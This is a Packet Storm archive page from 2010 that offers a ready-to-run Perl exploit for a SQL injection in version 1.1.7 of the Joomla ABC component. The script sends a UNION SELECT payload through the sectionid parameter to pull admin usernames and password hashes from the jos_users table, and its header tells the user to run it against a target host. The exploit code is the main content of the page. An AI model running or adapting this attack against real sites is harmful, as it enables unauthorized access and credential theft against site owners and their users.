exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla ABC 1.1.7 SQL Injection

Joomla ABC 1.1.7 SQL Injection
Posted Apr 28, 2010
Authored by AntiSecurity

Joomla ABC component version 1.1.7 remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | bd1065e1b88b9bf69ff7e8ab60a2b9925870ec1faddeadbbd0e042b1cd2336fb

Joomla ABC 1.1.7 SQL Injection

Change Mirror Download
#!/usr/bin/perl

#***********************************************************************#
# #
# [o] ABC Joomla Extension SQL Injection Exploit #
# Software : com_abc version 1.1.7 #
# Vendor : http://www.airiny.com/ #
# Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
# Contact : public[at]antisecurity[dot]org #
# Home : http://antisecurity.org/ #
# #
# [o] Usage #
# root@evilc0de:~# perl abc.pl www.target.com #
# #
# [o] Greetz #
# Angela Zhang stardustmemory aJe martfella pizzyroot Genex #
# H312Y yooogy mousekill }^-^{ noname matthews wishnusakti #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 #
# #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia #
# #
#***********************************************************************#

use HTTP::Request;
use LWP::UserAgent;

my $target = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
print "\n[x]===============================================[x]\n";
print "[x] ABC Joomla Extension SQL Injection Exploit [x]\n";
print "[x] [C]oded By AntiSecurity [x]\n";
print "[x]===============================================[x]\n\n";

my $exploit = "http://".$target.$file_vuln.$sql_query;

my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close